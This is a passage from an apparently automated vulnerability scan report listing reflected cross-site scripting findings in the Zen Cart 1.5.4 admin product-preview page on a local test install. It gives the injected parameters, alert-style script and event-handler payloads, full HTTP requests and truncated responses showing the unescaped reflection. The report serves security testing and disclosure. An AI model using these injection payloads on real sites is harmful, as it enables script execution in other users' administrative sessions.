        </table></td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
      <tr>
        <td class="main">
          <img src="http://localhost:8081/zen-cart/images/3ds/25" border="0" alt="3ds/25" title=" 3ds/25 " width="100" height="80" align="right" hspace="5" vspace="5"><script>alert(14405309.41407)</script>        </td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
      <tr>
        <td class="main">For more information, please visit this products <a href="http://http://www.kelev.biz" target="blank">webpage</a>.</td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
      <tr>
        <td align="center" class="smallText">This product was added to our catalog on Tuesday 25 August, 2015.</td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
<form name="update_product" action="http://localhost:8081/zen-cart/admin1/product.php?cPath=1&product_type=1&pID=2&action=update_product" method="post" enctype="multipart/form-data"><input type="hidden" name="securityToken" value="9adbdf7813e8bda76f1aa498b0b5f4ea" />      <tr>
        <td align="right" class="smallText">


Finding 3.17:  Cross-Site Scripting. This is a reflected XSS vulnerability, 
detected in an alert that was an immediate response to the injection.

Injected item: POST: img_dir
Injection value: >"><script>alert(14405309.41787)</script>
Detection value: alert(14405309.41787)

HTTP Request 

POST /zen-cart/admin1/product.php?cPath=1&product_type=1&pID=2&action=new_product_preview&search=test HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/20080630 Firefox/3.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: 
Connection: keep-alive
Referer: http://localhost:8081/zen-cart/admin1/product.php?cPath=1&product_type=1&pID=2&action=new_product&search=test
Cookie: zenAdminID=v1rn6j22v0e0dj3e010dukn5t4
Content-Type: multipart/form-data; boundary=---------------------------28667138731706
Content-Length: 4986

-----------------------------28667138731706
Content-Disposition: form-data; name="securityToken"

9adbdf7813e8bda76f1aa498b0b5f4ea
-----------------------------28667138731706
Content-Disposition: form-data; name="products_date_added"

2015-08-25 18:43:21
-----------------------------28667138731706
Content-Disposition: form-data; name="x"

0
-----------------------------28667138731706
Content-Disposition: form-data; name="y"

0
-----------------------------28667138731706
Content-Disposition: form-data; name="master_category"

1
-----------------------------28667138731706
Content-Disposition: form-data; name="master_categories_id"

1
-----------------------------28667138731706
Content-Disposition: form-data; name="products_discount_type"

0
-----------------------------28667138731706
Content-Disposition: form-data; name="products_discount_type_from"

0
-----------------------------28667138731706
Content-Disposition: form-data; name="products_price_sorter"

12.0000
-----------------------------28667138731706
Content-Disposition: form-data; name="products_status"

0
-----------------------------28667138731706
Content-Disposition: form-data; name="products_date_available"

08/25/2015
-----------------------------28667138731706
Content-Disposition: form-data; name="manufacturers_id"

1
-----------------------------28667138731706
Content-Disposition: form-data; name="products_name[2]"

admin
-----------------------------28667138731706
Content-Disposition: form-data; name="products_name[1]"

admin
-----------------------------28667138731706
Content-Disposition: form-data; name="product_is_free"

0
-----------------------------28667138731706
Content-Disposition: form-data; name="product_is_call"

0
-----------------------------28667138731706
Content-Disposition: form-data; name="products_priced_by_attribute"

0
-----------------------------28667138731706
Content-Disposition: form-data; name="products_tax_class_id"

1
-----------------------------28667138731706
Content-Disposition: form-data; name="products_price"

12
-----------------------------28667138731706
Content-Disposition: form-data; name="products_price_gross"

12
-----------------------------28667138731706
Content-Disposition: form-data; name="products_virtual"

0
-----------------------------28667138731706
Content-Disposition: form-data; name="product_is_always_free_shipping"

2
-----------------------------28667138731706
Content-Disposition: form-data; name="products_qty_box_status"

1
-----------------------------28667138731706
Content-Disposition: form-data; name="products_quantity_order_min"

12
-----------------------------28667138731706
Content-Disposition: form-data; name="products_quantity_order_max"

12
-----------------------------28667138731706
Content-Disposition: form-data; name="products_quantity_order_units"

12
-----------------------------28667138731706
Content-Disposition: form-data; name="products_quantity_mixed"

1
-----------------------------28667138731706
Content-Disposition: form-data; name="products_description[2]"

Default text
-----------------------------28667138731706
Content-Disposition: form-data; name="products_description[1]"

test
-----------------------------28667138731706
Content-Disposition: form-data; name="products_quantity"

1222111
-----------------------------28667138731706
Content-Disposition: form-data; name="products_model"

testval
-----------------------------28667138731706
Content-Disposition: form-data; name="products_image"; filename=""
Content-Type: application/octet-stream


-----------------------------28667138731706
Content-Disposition: form-data; name="products_previous_image"

3ds/25
-----------------------------28667138731706
Content-Disposition: form-data; name="img_dir"

>"><script>alert(14405309.41787)</script>
-----------------------------28667138731706
Content-Disposition: form-data; name="image_delete"

0
-----------------------------28667138731706
Content-Disposition: form-data; name="overwrite"

1
-----------------------------28667138731706
Content-Disposition: form-data; name="products_image_manual"

25
-----------------------------28667138731706
Content-Disposition: form-data; name="products_url[2]"

http://www.kelev.biz
-----------------------------28667138731706
Content-Disposition: form-data; name="products_url[1]"

http://www.kelev.biz
-----------------------------28667138731706
Content-Disposition: form-data; name="products_weight"

0
-----------------------------28667138731706
Content-Disposition: form-data; name="products_sort_order"

0
-----------------------------28667138731706
Content-Disposition: form-data; name="products_date_added"

2015-08-25 18:43:21
-----------------------------28667138731706
Content-Disposition: form-data; name="search"

test
-----------------------------28667138731706--



HTTP Response
----Truncated due to large size ---
 
Manager</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/media_types.php">Media Types</a></li>
              </ul>
    </li>
      </ul>
</div>
<!-- header_eof //-->

<!-- body //-->
<table border="0" width="100%" cellspacing="2" cellpadding="2">
  <tr>
<!-- body_text //-->
    <td width="100%" valign="top">
    <table border="0" width="100%" cellspacing="0" cellpadding="2">
      <tr>
        <td><table border="0" width="100%" cellspacing="0" cellpadding="0">
          <tr>
            <td class="pageHeading"><img src="http://localhost:8081/zen-cart/includes/languages/testval/images/25" border="0" alt="admin" title=" admin ">&nbsp;admin</td>
            <td class="pageHeading" align="right">$12.00</td>
          </tr>
        </table></td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
      <tr>
        <td class="main">
          <img src="http://localhost:8081/zen-cart/images/>"><script>alert(14405309.41787)</script>25" border="0" alt=">"><script>alert(14405309.41787)</script>25" title=" >"><script>alert(14405309.41787)</script>25 " width="100" height="80" align="right" hspace="5" vspace="5">Default text        </td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
      <tr>
        <td class="main">For more information, please visit this products <a href="http://http://www.kelev.biz" target="blank">webpage</a>.</td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
      <tr>
        <td align="center" class="smallText">This product was added to our catalog on Tuesday 25 August, 2015.</td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
    <table border="0" width="100%" cellspacing="0" cellpadding="2">
      <tr>
        <td><table border="0" width="100%" cellspaci



Finding 3.18:  Cross-Site Scripting. This is a reflected XSS vulnerability, 
detected in an alert that was an immediate response to the injection.

Injected item: POST: products_image_manual
Injection value: >"><script>alert(14405309.41877)</script>
Detection value: alert(14405309.41877)

HTTP Request 

POST /zen-cart/admin1/product.php?cPath=1&product_type=1&pID=2&action=new_product_preview&search=test HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/20080630 Firefox/3.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: 
Connection: keep-alive
Referer: http://localhost:8081/zen-cart/admin1/product.php?cPath=1&product_type=1&pID=2&action=new_product&search=test
Cookie: zenAdminID=v1rn6j22v0e0dj3e010dukn5t4
Content-Type: multipart/form-data; boundary=---------------------------28667138731706
Content-Length: 4988

-----------------------------28667138731706
Content-Disposition: form-data; name="securityToken"

9adbdf7813e8bda76f1aa498b0b5f4ea
-----------------------------28667138731706
Content-Disposition: form-data; name="products_date_added"

2015-08-25 18:43:21
-----------------------------28667138731706
Content-Disposition: form-data; name="x"

0
-----------------------------28667138731706
Content-Disposition: form-data; name="y"

0
-----------------------------28667138731706
Content-Disposition: form-data; name="master_category"

1
-----------------------------28667138731706
Content-Disposition: form-data; name="master_categories_id"

1
-----------------------------28667138731706
Content-Disposition: form-data; name="products_discount_type"

0
-----------------------------28667138731706
Content-Disposition: form-data; name="products_discount_type_from"

0
-----------------------------28667138731706
Content-Disposition: form-data; name="products_price_sorter"

12.0000
-----------------------------28667138731706
Content-Disposition: form-data; name="products_status"

0
-----------------------------28667138731706
Content-Disposition: form-data; name="products_date_available"

08/25/2015
-----------------------------28667138731706
Content-Disposition: form-data; name="manufacturers_id"

1
-----------------------------28667138731706
Content-Disposition: form-data; name="products_name[2]"

admin
-----------------------------28667138731706
Content-Disposition: form-data; name="products_name[1]"

admin
-----------------------------28667138731706
Content-Disposition: form-data; name="product_is_free"

0
-----------------------------28667138731706
Content-Disposition: form-data; name="product_is_call"

0
-----------------------------28667138731706
Content-Disposition: form-data; name="products_priced_by_attribute"

0
-----------------------------28667138731706
Content-Disposition: form-data; name="products_tax_class_id"

1
-----------------------------28667138731706
Content-Disposition: form-data; name="products_price"

12
-----------------------------28667138731706
Content-Disposition: form-data; name="products_price_gross"

12
-----------------------------28667138731706
Content-Disposition: form-data; name="products_virtual"

0
-----------------------------28667138731706
Content-Disposition: form-data; name="product_is_always_free_shipping"

2
-----------------------------28667138731706
Content-Disposition: form-data; name="products_qty_box_status"

1
-----------------------------28667138731706
Content-Disposition: form-data; name="products_quantity_order_min"

12
-----------------------------28667138731706
Content-Disposition: form-data; name="products_quantity_order_max"

12
-----------------------------28667138731706
Content-Disposition: form-data; name="products_quantity_order_units"

12
-----------------------------28667138731706
Content-Disposition: form-data; name="products_quantity_mixed"

1
-----------------------------28667138731706
Content-Disposition: form-data; name="products_description[2]"

Default text
-----------------------------28667138731706
Content-Disposition: form-data; name="products_description[1]"

test
-----------------------------28667138731706
Content-Disposition: form-data; name="products_quantity"

1222111
-----------------------------28667138731706
Content-Disposition: form-data; name="products_model"

testval
-----------------------------28667138731706
Content-Disposition: form-data; name="products_image"; filename=""
Content-Type: application/octet-stream


-----------------------------28667138731706
Content-Disposition: form-data; name="products_previous_image"

3ds/25
-----------------------------28667138731706
Content-Disposition: form-data; name="img_dir"

3ds/
-----------------------------28667138731706
Content-Disposition: form-data; name="image_delete"

0
-----------------------------28667138731706
Content-Disposition: form-data; name="overwrite"

1
-----------------------------28667138731706
Content-Disposition: form-data; name="products_image_manual"

>"><script>alert(14405309.41877)</script>
-----------------------------28667138731706
Content-Disposition: form-data; name="products_url[2]"

http://www.kelev.biz
-----------------------------28667138731706
Content-Disposition: form-data; name="products_url[1]"

http://www.kelev.biz
-----------------------------28667138731706
Content-Disposition: form-data; name="products_weight"

0
-----------------------------28667138731706
Content-Disposition: form-data; name="products_sort_order"

0
-----------------------------28667138731706
Content-Disposition: form-data; name="products_date_added"

2015-08-25 18:43:21
-----------------------------28667138731706
Content-Disposition: form-data; name="search"

test
-----------------------------28667138731706--



HTTP Response
----Truncated due to large size ---
 
ger</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/media_types.php">Media Types</a></li>
              </ul>
    </li>
      </ul>
</div>
<!-- header_eof //-->

<!-- body //-->
<table border="0" width="100%" cellspacing="2" cellpadding="2">
  <tr>
<!-- body_text //-->
    <td width="100%" valign="top">
    <table border="0" width="100%" cellspacing="0" cellpadding="2">
      <tr>
        <td><table border="0" width="100%" cellspacing="0" cellpadding="0">
          <tr>
            <td class="pageHeading"><img src="http://localhost:8081/zen-cart/includes/languages/testval/images/25" border="0" alt="admin" title=" admin ">&nbsp;admin</td>
            <td class="pageHeading" align="right">$12.00</td>
          </tr>
        </table></td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
      <tr>
        <td class="main">
          <img src="http://localhost:8081/zen-cart/images/3ds/>"><script>alert(14405309.41877)</script>" border="0" alt="3ds/>"><script>alert(14405309.41877)</script>" title=" 3ds/>"><script>alert(14405309.41877)</script> " width="100" height="80" align="right" hspace="5" vspace="5">Default text        </td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
      <tr>
        <td class="main">For more information, please visit this products <a href="http://http://www.kelev.biz" target="blank">webpage</a>.</td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
      <tr>
        <td align="center" class="smallText">This product was added to our catalog on Tuesday 25 August, 2015.</td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
    <table border="0" width="100%" cellspacing="0" cellpadding="2">
      <tr>
        <td><table border="0" width="100%" cellspa


Finding 3.19:  Cross-Site Scripting. This is a reflected XSS vulnerability, 
detected in an alert that was an immediate response to the injection.

Injected item: POST: products_url[2]
Injection value: >"><script>alert(14405309.42107)</script>
Detection value: alert(14405309.42107)

HTTP Request 

POST /zen-cart/admin1/product.php?cPath=1&product_type=1&pID=2&action=new_product_preview&search=test HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/20080630 Firefox/3.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: 
Connection: keep-alive
Referer: http://localhost:8081/zen-cart/admin1/product.php?cPath=1&product_type=1&pID=2&action=new_product&search=test
Cookie: zenAdminID=v1rn6j22v0e0dj3e010dukn5t4
Content-Type: multipart/form-data; boundary=---------------------------28667138731706
Content-Length: 4970

-----------------------------28667138731706
Content-Disposition: form-data; name="securityToken"

9adbdf7813e8bda76f1aa498b0b5f4ea
-----------------------------28667138731706
Content-Disposition: form-data; name="products_date_added"

2015-08-25 18:43:21
-----------------------------28667138731706
Content-Disposition: form-data; name="x"

0
-----------------------------28667138731706
Content-Disposition: form-data; name="y"

0
-----------------------------28667138731706
Content-Disposition: form-data; name="master_category"

1
-----------------------------28667138731706
Content-Disposition: form-data; name="master_categories_id"

1
-----------------------------28667138731706
Content-Disposition: form-data; name="products_discount_type"

0
-----------------------------28667138731706
Content-Disposition: form-data; name="products_discount_type_from"

0
-----------------------------28667138731706
Content-Disposition: form-data; name="products_price_sorter"

12.0000
-----------------------------28667138731706
Content-Disposition: form-data; name="products_status"

0
-----------------------------28667138731706
Content-Disposition: form-data; name="products_date_available"

08/25/2015
-----------------------------28667138731706
Content-Disposition: form-data; name="manufacturers_id"

1
-----------------------------28667138731706
Content-Disposition: form-data; name="products_name[2]"

admin
-----------------------------28667138731706
Content-Disposition: form-data; name="products_name[1]"

admin
-----------------------------28667138731706
Content-Disposition: form-data; name="product_is_free"

0
-----------------------------28667138731706
Content-Disposition: form-data; name="product_is_call"

0
-----------------------------28667138731706
Content-Disposition: form-data; name="products_priced_by_attribute"

0
-----------------------------28667138731706
Content-Disposition: form-data; name="products_tax_class_id"

1
-----------------------------28667138731706
Content-Disposition: form-data; name="products_price"

12
-----------------------------28667138731706
Content-Disposition: form-data; name="products_price_gross"

12
-----------------------------28667138731706
Content-Disposition: form-data; name="products_virtual"

0
-----------------------------28667138731706
Content-Disposition: form-data; name="product_is_always_free_shipping"

2
-----------------------------28667138731706
Content-Disposition: form-data; name="products_qty_box_status"

1
-----------------------------28667138731706
Content-Disposition: form-data; name="products_quantity_order_min"

12
-----------------------------28667138731706
Content-Disposition: form-data; name="products_quantity_order_max"

12
-----------------------------28667138731706
Content-Disposition: form-data; name="products_quantity_order_units"

12
-----------------------------28667138731706
Content-Disposition: form-data; name="products_quantity_mixed"

1
-----------------------------28667138731706
Content-Disposition: form-data; name="products_description[2]"

Default text
-----------------------------28667138731706
Content-Disposition: form-data; name="products_description[1]"

test
-----------------------------28667138731706
Content-Disposition: form-data; name="products_quantity"

1222111
-----------------------------28667138731706
Content-Disposition: form-data; name="products_model"

testval
-----------------------------28667138731706
Content-Disposition: form-data; name="products_image"; filename=""
Content-Type: application/octet-stream


-----------------------------28667138731706
Content-Disposition: form-data; name="products_previous_image"

3ds/25
-----------------------------28667138731706
Content-Disposition: form-data; name="img_dir"

3ds/
-----------------------------28667138731706
Content-Disposition: form-data; name="image_delete"

0
-----------------------------28667138731706
Content-Disposition: form-data; name="overwrite"

1
-----------------------------28667138731706
Content-Disposition: form-data; name="products_image_manual"

25
-----------------------------28667138731706
Content-Disposition: form-data; name="products_url[2]"

>"><script>alert(14405309.42107)</script>
-----------------------------28667138731706
Content-Disposition: form-data; name="products_url[1]"

http://www.kelev.biz
-----------------------------28667138731706
Content-Disposition: form-data; name="products_weight"

0
-----------------------------28667138731706
Content-Disposition: form-data; name="products_sort_order"

0
-----------------------------28667138731706
Content-Disposition: form-data; name="products_date_added"

2015-08-25 18:43:21
-----------------------------28667138731706
Content-Disposition: form-data; name="search"

test
-----------------------------28667138731706--



HTTP Response
----Truncated due to large size ---
 
h="100%" cellspacing="0" cellpadding="2">
      <tr>
        <td><table border="0" width="100%" cellspacing="0" cellpadding="0">
          <tr>
            <td class="pageHeading"><img src="http://localhost:8081/zen-cart/includes/languages/testval/images/25" border="0" alt="admin" title=" admin ">&nbsp;admin</td>
            <td class="pageHeading" align="right">$12.00</td>
          </tr>
        </table></td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
      <tr>
        <td class="main">
          <img src="http://localhost:8081/zen-cart/images/3ds/25" border="0" alt="3ds/25" title=" 3ds/25 " width="100" height="80" align="right" hspace="5" vspace="5">Default text        </td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
      <tr>
        <td class="main">For more information, please visit this products <a href="http://>"><script>alert(14405309.42107)</script>" target="blank">webpage</a>.</td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
      <tr>
        <td align="center" class="smallText">This product was added to our catalog on Tuesday 25 August, 2015.</td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
    <table border="0" width="100%" cellspacing="0" cellpadding="2">
      <tr>
        <td><table border="0" width="100%" cellspacing="0" cellpadding="0">
          <tr>
            <td class="pageHeading"><img src="http://localhost:8081/zen-cart/includes/languages/english/images/icon.gif" border="0" alt="English" title=" English ">&nbsp;admin</td>
            <td class="pageHeading" align="right">$12.00</td>
          </tr>
        </table></td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
      

Finding 3.20:  Cross-Site Scripting. This is a reflected XSS vulnerability, 
detected in an alert that was an immediate response to the injection.

Injected item: POST: products_url[1]
Injection value: >"><script>alert(14405309.42117)</script>
Detection value: alert(14405309.42117)

HTTP Request 

POST /zen-cart/admin1/product.php?cPath=1&product_type=1&pID=2&action=new_product_preview&search=test HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/20080630 Firefox/3.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: 
Connection: keep-alive
Referer: http://localhost:8081/zen-cart/admin1/product.php?cPath=1&product_type=1&pID=2&action=new_product&search=test
Cookie: zenAdminID=v1rn6j22v0e0dj3e010dukn5t4
Content-Type: multipart/form-data; boundary=---------------------------28667138731706
Content-Length: 4970

-----------------------------28667138731706
Content-Disposition: form-data; name="securityToken"

9adbdf7813e8bda76f1aa498b0b5f4ea
-----------------------------28667138731706
Content-Disposition: form-data; name="products_date_added"

2015-08-25 18:43:21
-----------------------------28667138731706
Content-Disposition: form-data; name="x"

0
-----------------------------28667138731706
Content-Disposition: form-data; name="y"

0
-----------------------------28667138731706
Content-Disposition: form-data; name="master_category"

1
-----------------------------28667138731706
Content-Disposition: form-data; name="master_categories_id"

1
-----------------------------28667138731706
Content-Disposition: form-data; name="products_discount_type"

0
-----------------------------28667138731706
Content-Disposition: form-data; name="products_discount_type_from"

0
-----------------------------28667138731706
Content-Disposition: form-data; name="products_price_sorter"

12.0000
-----------------------------28667138731706
Content-Disposition: form-data; name="products_status"

0
-----------------------------28667138731706
Content-Disposition: form-data; name="products_date_available"

08/25/2015
-----------------------------28667138731706
Content-Disposition: form-data; name="manufacturers_id"

1
-----------------------------28667138731706
Content-Disposition: form-data; name="products_name[2]"

admin
-----------------------------28667138731706
Content-Disposition: form-data; name="products_name[1]"

admin
-----------------------------28667138731706
Content-Disposition: form-data; name="product_is_free"

0
-----------------------------28667138731706
Content-Disposition: form-data; name="product_is_call"

0
-----------------------------28667138731706
Content-Disposition: form-data; name="products_priced_by_attribute"

0
-----------------------------28667138731706
Content-Disposition: form-data; name="products_tax_class_id"

1
-----------------------------28667138731706
Content-Disposition: form-data; name="products_price"

12
-----------------------------28667138731706
Content-Disposition: form-data; name="products_price_gross"

12
-----------------------------28667138731706
Content-Disposition: form-data; name="products_virtual"

0
-----------------------------28667138731706
Content-Disposition: form-data; name="product_is_always_free_shipping"

2
-----------------------------28667138731706
Content-Disposition: form-data; name="products_qty_box_status"

1
-----------------------------28667138731706
Content-Disposition: form-data; name="products_quantity_order_min"

12
-----------------------------28667138731706
Content-Disposition: form-data; name="products_quantity_order_max"

12
-----------------------------28667138731706
Content-Disposition: form-data; name="products_quantity_order_units"

12
-----------------------------28667138731706
Content-Disposition: form-data; name="products_quantity_mixed"

1
-----------------------------28667138731706
Content-Disposition: form-data; name="products_description[2]"

Default text
-----------------------------28667138731706
Content-Disposition: form-data; name="products_description[1]"

test
-----------------------------28667138731706
Content-Disposition: form-data; name="products_quantity"

1222111
-----------------------------28667138731706
Content-Disposition: form-data; name="products_model"

testval
-----------------------------28667138731706
Content-Disposition: form-data; name="products_image"; filename=""
Content-Type: application/octet-stream


-----------------------------28667138731706
Content-Disposition: form-data; name="products_previous_image"

3ds/25
-----------------------------28667138731706
Content-Disposition: form-data; name="img_dir"

3ds/
-----------------------------28667138731706
Content-Disposition: form-data; name="image_delete"

0
-----------------------------28667138731706
Content-Disposition: form-data; name="overwrite"

1
-----------------------------28667138731706
Content-Disposition: form-data; name="products_image_manual"

25
-----------------------------28667138731706
Content-Disposition: form-data; name="products_url[2]"

http://www.kelev.biz
-----------------------------28667138731706
Content-Disposition: form-data; name="products_url[1]"

>"><script>alert(14405309.42117)</script>
-----------------------------28667138731706
Content-Disposition: form-data; name="products_weight"

0
-----------------------------28667138731706
Content-Disposition: form-data; name="products_sort_order"

0
-----------------------------28667138731706
Content-Disposition: form-data; name="products_date_added"

2015-08-25 18:43:21
-----------------------------28667138731706
Content-Disposition: form-data; name="search"

test
-----------------------------28667138731706--



HTTP Response
----Truncated due to large size ---
 
"100%" cellspacing="0" cellpadding="2">
      <tr>
        <td><table border="0" width="100%" cellspacing="0" cellpadding="0">
          <tr>
            <td class="pageHeading"><img src="http://localhost:8081/zen-cart/includes/languages/english/images/icon.gif" border="0" alt="English" title=" English ">&nbsp;admin</td>
            <td class="pageHeading" align="right">$12.00</td>
          </tr>
        </table></td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
      <tr>
        <td class="main">
          <img src="http://localhost:8081/zen-cart/images/3ds/25" border="0" alt="3ds/25" title=" 3ds/25 " width="100" height="80" align="right" hspace="5" vspace="5">test        </td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
      <tr>
        <td class="main">For more information, please visit this products <a href="http://>"><script>alert(14405309.42117)</script>" target="blank">webpage</a>.</td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
      <tr>
        <td align="center" class="smallText">This product was added to our catalog on Tuesday 25 August, 2015.</td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
<form name="update_product" action="http://localhost:8081/zen-cart/admin1/product.php?cPath=1&product_type=1&pID=2&action=update_product" method="post" enctype="multipart/form-data"><input type="hidden" name="securityToken" value="9adbdf7813e8bda76f1aa498b0b5f4ea" />      <tr>
        <td align="right" class="smallText">
<input type="hidden" name="securityToken" value="9adbdf7813e8bda76f1aa498b0b5f4ea" /><input type="hidden" name="products_date_added" value="2015-08-25 18:43:21" /><input type="hidden" name="x" value="0" /><input type="hidden" name="y" value="0" /><input type="h



Finding 3.21:  Cross-Site Scripting. This is a reflected XSS vulnerability, 
detected in an alert that was an immediate response to the injection.

Injected item: GET: search
Injection value: x" onmousemove="alert(14405309.46617)
Detection value: x" onmousemove="alert(14405309.46617)

HTTP Request 

GET /zen-cart/admin1/product.php?cPath=1&product_type=1&pID=2&action=new_product_preview&search=x" onmousemove="alert(14405309.46617)&vcheck=yes HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/20080630 Firefox/3.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: 
Connection: keep-alive
X-Cenzic-Spider-Send-HeadRequest: true
Referer: http://localhost:8081/zen-cart/admin1/product.php?cPath=1&product_type=1&pID=2&action=new_product_preview&search=test
Cookie: zenAdminID=v1rn6j22v0e0dj3e010dukn5t4


HTTP Response 
----Truncated due to large size ---

<form name="update_product" action="http://localhost:8081/zen-cart/admin1/product.php?cPath=1&product_type=1&pID=2&action=update_product" method="post" enctype="multipart/form-data"><input type="hidden" name="securityToken" value="9adbdf7813e8bda76f1aa498b0b5f4ea" />      <tr>
        <td align="right" class="smallText">
<input type="hidden" name="products_name[2]" /><input type="hidden" name="products_description[2]" /><input type="hidden" name="products_url[2]" /><input type="hidden" name="products_name[1]" /><input type="hidden" name="products_description[1]" /><input type="hidden" name="products_url[1]" /><input type="hidden" name="products_image" value="3ds/25" /><input type="hidden" name="search" value="x&quot; onmousemove=&quot;alert(14405309.46617)" /><input type="image" src="includes/languages/english/images/buttons/button_back.gif" border="0" alt="Back" title=" Back " name="edit">&nbsp;&nbsp;<input type="image" src="includes/languages/english/images/buttons/button_update.gif" border="0" alt="Update" title=" Update ">&nbsp;&nbsp;<a href="http://localhost:8081/zen-cart/admin1/categories.php?cPath=1&pID=2&search=x" onmousemove="alert(14405309.46617)"><img src="includes/languages/english/images/buttons/button_cancel.gif" border="0" alt="Cancel" title=" Cancel "></a>        </td>
      </tr>
    </table></form>
    </td>
<!-- body_text_eof //-->
  </tr>
</table>
<!-- body_eof //-->

<!-- footer //-->
<table border="0" width="100%" cellspacing="10" cellpadding="10">
  <tr>
    <td align="center" class="smallText" height="100" valign="bottom"><a href="http://www.zen-cart.com" target="_blank"><img src="images/small_zen_logo.gif" alt="Zen Cart:: the art of e-commerce" border="0"></a><br /><br />E-Commerce Engine Copyright &copy; 2003-2015 <a href="http://www.zen-cart.com" target="_blank">Zen Cart&reg;</a><br /><a href="http://localhost:8081/zen-cart/admin1/server_info.php">Zen Cart v1.5.4/v1.5.4</a></td>
  </tr>
</table>
<!-- footer_eof //-->
<br />

Finding 3.22:  Cross-Site Scripting. This is a reflected XSS vulnerability, detected in an alert that was an immediate response to the injection.

Injected item: POST: products_description[2]
Injection value: <script>alert(14405309.56787)</script>
Detection value: <script>alert(14405309.56787)</script>

HTTP Request 

POST /zen-cart/admin1/product.php?cPath=1&product_type=1&pID=1&action=new_product_preview&page=1&search=test HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/20080630 Firefox/3.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: 
Connection: keep-alive
Referer: http://localhost:8081/zen-cart/admin1/product.php?page=1&product_type=1&cPath=1&pID=1&action=new_product&search=test
Cookie: zenAdminID=v1rn6j22v0e0dj3e010dukn5t4
Content-Type: multipart/form-data; boundary=---------------------------244472214220682
Content-Length: 5019

-----------------------------244472214220682
Content-Disposition: form-data; name="securityToken"

9adbdf7813e8bda76f1aa498b0b5f4ea
-----------------------------244472214220682
Content-Disposition: form-data; name="products_date_added"

2015-08-25 18:42:30
-----------------------------244472214220682
Content-Disposition: form-data; name="x"

0
-----------------------------244472214220682
Content-Disposition: form-data; name="y"

0
-----------------------------244472214220682
Content-Disposition: form-data; name="master_category"

1
-----------------------------244472214220682
Content-Disposition: form-data; name="master_categories_id"

1
-----------------------------244472214220682
Content-Disposition: form-data; name="products_discount_type"

0
-----------------------------244472214220682
Content-Disposition: form-data; name="products_discount_type_from"

0
-----------------------------244472214220682
Content-Disposition: form-data; name="products_price_sorter"

12.0000
-----------------------------244472214220682
Content-Disposition: form-data; name="products_status"

0
-----------------------------244472214220682
Content-Disposition: form-data; name="products_date_available"

08/25/2015
-----------------------------244472214220682
Content-Disposition: form-data; name="manufacturers_id"

1
-----------------------------244472214220682
Content-Disposition: form-data; name="products_name[2]"

admin
-----------------------------244472214220682
Content-Disposition: form-data; name="products_name[1]"

admin
-----------------------------244472214220682
Content-Disposition: form-data; name="product_is_free"

0
-----------------------------244472214220682
Content-Disposition: form-data; name="product_is_call"

0
-----------------------------244472214220682
